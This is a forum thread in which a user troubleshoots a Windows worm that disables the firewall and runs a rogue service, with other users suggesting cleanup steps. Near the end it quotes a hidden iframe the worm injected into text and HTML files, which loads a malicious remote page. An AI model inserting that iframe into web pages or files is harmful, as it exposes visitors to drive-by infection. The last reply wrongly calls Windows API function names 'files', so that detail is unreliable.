Windows And My Internet Acting Weird..

[rainman]

Something fishy seems to be going on with my computer since last night. When I browse the internet, i can load the first 1-2 pages, then all I get are blank pages and instantly. It doesn't even try to resolve the domain. I thought at first that it may be my DSL, so I changed to dialup. Same thing. I even tried another Windows user account and had the same problem. Can't be my router either, my wife's computer on the same network (where I'm typing from now) is working fine.

Not even transfers between my computer and my wife's computer on the internal network are working.

And randomly, I'm getting strange Windows error messages that I've never seen before in my 10+ years on a computer every day. I'm starting to think there's a virus, so I turned off all connections and am backing up the data, going for a format.

Strange stuff indeed.

[rainman]

I also just noticed my Windows Firewall is turned off, and the checkbox to turn it on or off is grey, so I cannot turn it back on. Windows Security Center is also shut down and cannot be turned on, even manually. Sigh

[Guest Reimar]

I believe your computer is infected!

If you familar withchanging a harddis pp. you could do this:

Take out the harddisk from your computer and connect it to the comp of your wife. Suposed your Wife computer has Antivirus running as system service (means startup the protection by booting) do a deep scan for Virus, Rootkit, Spy, Trojan and all this "animals".

If I you I would save my Data to an different HDD and format and install a clean system!

[rainman]

I was able to backup all my data and re-install Windows. I then installed Firefox and Skype, and guess what ...I got the same crap again! I'm thinking it's some kind of worm, but it is getting in even though Windows Firewall is turned on.

The file is running and its called 'systs.exe' and apparently has also installed itself into the Windows Services called 'tjk8rla0zxexp' and runs systs.exe on start-up. And from there I believe it disables Windows Firewall. Now it's disabled again, on a brand new copy of Windows!

[LivinLOS]

When you reinstalled windows.. did you do a full low level format ??

[nikster]

I would suggest to get some recent AV software to get rid of the virus/trojan/worm before doing another reinstall. Most of the time AV software can remove the offending programs without you having to reinstall things.

Also - did you insert any CDs, USB sticks that may have had copies of the virus? Definitely turn off auto-start, you can do that with Windows Powertoys, free download from MS.

Maybe download a Linux boot CD with a virus scanner - that allows you to boot from CD into Linux meaning you can be sure that the trojan is not running. This could be a good time to install and try out Ubuntu on a second partition

Also make sure there are no other machines on your network, or if you are in some shared WiFi or something don't use that. Install a recent AV program. If you really want to make your system secure use Secure-IT (unfortunate name for google searches) or something similar - it modifies your registry and allows you to shut down many services that you never use and most likely never knew windows had.

[rainman]

I did a full format, didn't insert any USB things or even CDs. Just the drivers for my motherboard and graphic card. I did find out what the worm or virus was, though. It was 'AWC' or something, which then downloaded other programs to further wreck my computer, by itself. I finally, after almost 24 hours, managed to completely get rid of it. Cleaned the registry, startup programs, etc.

[ballbreaker]

Sounds like you might have a virus in your MBR (Master Boot Record).

[cdnvic]

Try this antivirus, its a 30 day trial but it's probably the best at getting rid of stubborn infections, including boot sector viruses.

http://www.eset.com/

After a full scan it will ask if you want to do a boot scan on reboot. Say yes.

[rainman]

Will try that, thanks!

Just when I thought it's over, I noticed that the virus/worm has added a line of code into ALL my plain text files, including .TXT and .HTML, at the bottom, nearly the last line:

<iframe src="http://ntkrnlpa.info/rc/?i=1" width=1 height=1 style="border:0"></iframe>

When I opened one of the HTML files, and obviously got redirected to that hidden frame through the browser, I got this Windows crash message. I never heard of that sysnnwk.exe file and a search on Google doesn't have any records of it either. I think that web page there is causing the worm to activate, if you're already infected.

Remember in my first post I said I was getting blank pages? I don't think they were blank, but probably that hidden iframe code...

[A_Traveller]

The code is apparently based on an old Trojan, Agent Z. Most recent reports are in Chinese and a few in German. Try searching for ntkrnlpa.info/rc/. Google highlights the site as a threat as well.

Infection involves files:-

NtCreateFile

NtCreateProcess

NtCreateProcessEx

ZwCreateFile

ZwCreateProcess

ZwCreateProcessEx

One other option is to process the html and txt files with a program such as ReplaceEm which would erase the key line in these files.

Regards